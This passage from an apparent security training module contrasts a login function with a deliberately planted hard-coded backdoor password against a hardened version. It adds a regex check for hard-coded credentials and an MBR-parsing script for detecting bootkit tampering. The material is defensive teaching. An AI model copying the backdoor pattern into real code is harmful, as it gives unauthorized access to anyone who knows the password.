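    for name, password in users.items():
        salt = os.urandom(16)
        store[name] = (salt, derive_key(password, salt))
    return store


# --- Vulnerable: an undocumented "field support" password bypasses the credential store.
MAINTENANCE_PASSWORD = "letmein-fieldsupport"  # hypothetical hard-coded credential


def login_with_backdoor(store, username, password):
    if password == MAINTENANCE_PASSWORD:  # backdoor: any username, no record in the store
        return True
    entry = store.get(username)
    if entry is None:
        return False
    salt, digest = entry
    return derive_key(password, salt) == digest  # plain ==, not constant-time


# --- Hardened: only the credential store decides, and the comparison is constant-time.
def login_hardened(store, username, password):
    entry = store.get(username)
    # Derive a key even for unknown users so timing does not reveal which usernames exist.
    salt, digest = entry if entry is not None else (DUMMY_SALT, DUMMY_DIGEST)
    candidate = derive_key(password, salt)
    return entry is not None and hmac.compare_digest(candidate, digest)


# --- Review check: flag string literals assigned to credential-looking names in source text.
CREDENTIAL_ASSIGNMENT = re.compile(
    r'^\s*(?P<name>\w*(?:PASSWORD|PASSWD|SECRET|TOKEN)\w*)\s*=\s*["\'][^"\']+["\']',
    re.IGNORECASE | re.MULTILINE,
)


def find_hardcoded_credentials(source_text):
    """Return the variable names that are assigned a non-empty string literal."""
    return [m.group("name") for m in CREDENTIAL_ASSIGNMENT.finditer(source_text)]


# Constructed source snippet for the review check (not real project code).
SAMPLE_SOURCE = '''
DB_HOST = "db.internal"
MAINTENANCE_PASSWORD = "letmein-fieldsupport"
api_token = 'abc123'
MAX_RETRIES = 3
'''

if __name__ == "__main__":
    users = make_user_store({"alice": "correct horse battery staple"})
    print("backdoor login as 'anyone':", login_with_backdoor(users, "anyone", MAINTENANCE_PASSWORD))
    print("hardened login as 'anyone':", login_hardened(users, "anyone", MAINTENANCE_PASSWORD))
    print("hardened login as alice:  ", login_hardened(users, "alice", "correct horse battery staple"))
    print("credential-looking assignments:", find_hardcoded_credentials(SAMPLE_SOURCE))
```

The point of the contrast is that `login_hardened` has no code path that returns `True` without a matching record in the store, so there is nothing for an attacker to learn from the binary or the source that grants access on its own. The regex check is deliberately crude (it would also flag this very file), but that is what makes it useful as a first pass: anything it reports should be moved into a secrets manager or environment configuration and the finding justified in review.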

Bootkit

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the
Master Boot Record (MBR) and Volume Boot Record (VBR). Attackers use bootkits to persist on
systems at a layer below the operating system, where the malicious code runs before the OS and
its security controls load. Because reinstalling the operating system does not necessarily
rewrite the boot sectors, a full restoration may fail unless the organization suspects that a
bootkit was used and acts accordingly, for example by wiping and rewriting the boot sectors.
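A concrete check for the persistence described above, added here as an example that is not part of the original module: parse a 512-byte MBR image, extract the partition table, and compare the bootstrap code against a known-good hash, so that a modified boot sector can be spotted during triage and confirmed gone after restoration. The sample image, the baseline hash and the partition values are constructed for illustration.

```python
"""Parse a 512-byte MBR and compare its bootstrap code against a known-good baseline.

Added example: the sample image, the baseline hash and the partition values are
constructed for illustration, not taken from a real disk.
"""
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 440            # bootstrap code; the 4-byte disk signature follows at 0x1B8
DISK_SIG_OFFSET = 0x1B8
PART_TABLE_OFFSET = 0x1BE      # four 16-byte partition entries
BOOT_SIG_OFFSET = 0x1FE        # 0x55 0xAA
PART_ENTRY = "<B3sB3sII"       # status, CHS start, type, CHS end, LBA start, sector count

# Constructed placeholder bootstrap code: a short jump followed by zero padding.
CLEAN_BOOT_CODE = b"\xEB\x3C\x90" + b"\x00" * (BOOT_CODE_LEN - 3)


def build_sample_mbr(boot_code):
    """Constructed MBR image with one bootable type-0x07 partition at LBA 2048."""
    if len(boot_code) > BOOT_CODE_LEN:
        raise ValueError("boot code must fit in 440 bytes")
    mbr = bytearray(SECTOR_SIZE)
    mbr[:len(boot_code)] = boot_code
    struct.pack_into("<I", mbr, DISK_SIG_OFFSET, 0x1234ABCD)
    entry = struct.pack(PART_ENTRY, 0x80, b"\x20\x21\x00", 0x07, b"\xFE\xFF\xFF", 2048, 204800)
    mbr[PART_TABLE_OFFSET:PART_TABLE_OFFSET + 16] = entry
    mbr[BOOT_SIG_OFFSET:BOOT_SIG_OFFSET + 2] = b"\x55\xAA"
    return bytes(mbr)


def parse_mbr(mbr):
    """Return the boot-code hash, disk signature and non-empty partition entries."""
    if len(mbr) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly 512 bytes")
    if mbr[BOOT_SIG_OFFSET:BOOT_SIG_OFFSET + 2] != b"\x55\xAA":
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        status, _, ptype, _, lba_start, sectors = struct.unpack_from(
            PART_ENTRY, mbr, PART_TABLE_OFFSET + 16 * i)
        if ptype != 0x00:  # type 0x00 marks an unused slot
            partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": sectors})
    return {
        "boot_code_sha256": hashlib.sha256(mbr[:BOOT_CODE_LEN]).hexdigest(),
        "disk_signature": struct.unpack_from("<I", mbr, DISK_SIG_OFFSET)[0],
        "partitions": partitions,
    }


def check_boot_code(mbr, baseline_sha256):
    """True when the bootstrap code matches the known-good hash."""
    return parse_mbr(mbr)["boot_code_sha256"] == baseline_sha256


def diff_mbr(baseline, suspect):
    """Report which regions differ; a bootkit typically changes the boot code only."""
    regions = {
        "boot_code": (0, BOOT_CODE_LEN),
        "disk_signature": (DISK_SIG_OFFSET, DISK_SIG_OFFSET + 4),
        "partition_table": (PART_TABLE_OFFSET, BOOT_SIG_OFFSET),
        "boot_signature": (BOOT_SIG_OFFSET, SECTOR_SIZE),
    }
    return {name: baseline[a:b] != suspect[a:b] for name, (a, b) in regions.items()}


if __name__ == "__main__":
    clean = build_sample_mbr(CLEAN_BOOT_CODE)
    baseline = parse_mbr(clean)["boot_code_sha256"]
    # Simulated tampering: the jump target changed and the rest of the code area overwritten.
    tampered = build_sample_mbr(b"\xEB\x7E\x90" + b"\xCC" * (BOOT_CODE_LEN - 3))
    print("clean matches baseline:   ", check_boot_code(clean, baseline))
    print("tampered matches baseline:", check_boot_code(tampered, baseline))
    print("changed regions:", [k for k, v in diff_mbr(clean, tampered).items() if v])
```

On a real system the 512 bytes come from the first sector of the physical disk, read with a raw-disk tool rather than through the filesystem, and the baseline hash is taken from a known-clean install of the same boot loader version. Hashing only the first 440 bytes matters because the disk signature at 0x1B8 and the partition table legitimately differ between machines; a boot-code mismatch with an untouched partition table is exactly the pattern a bootkit leaves, and re-running the check after recovery confirms that the boot sector itself was rewritten, not just the operating system.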
